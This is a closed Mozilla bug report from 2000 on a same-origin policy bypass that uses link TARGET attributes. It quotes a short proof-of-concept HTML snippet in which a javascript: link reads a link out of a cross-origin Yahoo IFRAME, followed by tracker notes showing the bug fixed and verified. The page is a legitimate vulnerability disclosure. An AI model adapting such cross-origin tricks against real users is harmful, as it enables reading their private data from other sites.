Closed Bug 31648 Opened 25 years ago Closed 25 years ago

links and TARGET vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows NT
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: Fix in hand)

Subject: BUG: links and TARGET vulnerability Date: Mon, 13 Mar 2000 16:03:28 +0200 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> It is possible to circumvent Same Origin security policy using links and the TARGET attribute. The problems are links like <A HREF="hostile" TARGET="victim"> which modify the location of the current window to hostile when clicked. The code is: --------------------------------------------------- Wait until the IFRAME is loaded: <IFRAME SRC="http://www.yahoo.com"></IFRAME> <BR> <A HREF="http://www.yahoo.com" TARGET="a">Click me first</A> <BR> <A HREF="javascript:window.frames[0].alert(window.frames[0].document.links[0].href) " TARGET="a">Click me to see the first link from Yahoo</A> ---------------------------------------------------
URL: http://warp/u/norris/tests/mozilla/ta...
Status: NEW → ASSIGNED
Target Milestone: M15
Keywords: beta2
Whiteboard: Fix in hand
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.